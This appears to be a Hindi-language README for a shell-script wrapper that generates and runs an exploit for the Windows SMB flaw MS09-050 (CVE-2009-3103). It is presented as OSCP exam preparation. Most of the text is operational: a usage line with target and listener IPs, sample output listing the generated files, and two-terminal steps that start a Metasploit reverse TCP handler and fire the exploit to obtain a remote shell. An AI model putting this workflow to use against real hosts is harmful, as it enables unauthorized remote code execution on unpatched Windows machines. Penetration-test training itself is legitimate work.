
MS09-050 (CVE-2009-3103) शोषण के लिए वन-लाइनर सेटअप। कोई झंझट नहीं, कोई डीबगिंग नहीं, बस काम करता है।
अधिकांश MS09-050 स्क्रिप्ट जो इधर-उधर घूम रही हैं, उन्हें मैन्युअल शेलकोड इंजेक्शन की आवश्यकता होती है, हैंडलर के साथ टाइमिंग की समस्याएँ होती हैं, या बस काम नहीं करतीं। यह रैपर:
समय मायने रखने वाली OSCP तैयारी के लिए बनाया गया।
msfvenommsfconsolepython2rpcclient (आमतौर पर पहले से इंस्टॉल होता है)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
आउटपुट:
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
- exploit.py
- handler.rc
=== RUN ===
Terminal 1: msfconsole -q -r handler.rc
Terminal 2: python2 exploit.py 192.168.233.40
टर्मिनल 1 - हैंडलर शुरू करें:
msfconsole -q -r handler.rc
इसकी प्रतीक्षा करें: Started reverse TCP handler on ...
टर्मिनल 2 - एक्सप्लॉइट चलाएँ:
python2 exploit.py 192.168.233.40
अपना शेल पाने के लिए टर्मिनल 1 जाँचें।
windows/shell/reverse_tcp) का उपयोग करता है - इस एक्सप्लॉइट में स्टेजर के साथ विश्वसनीय रूप से काम करता हैमूल एक्सप्लॉइट ohnozzy के MS09-050 PoC पर आधारित है।
MIT - जो चाहें करें, बस बुराई न करें।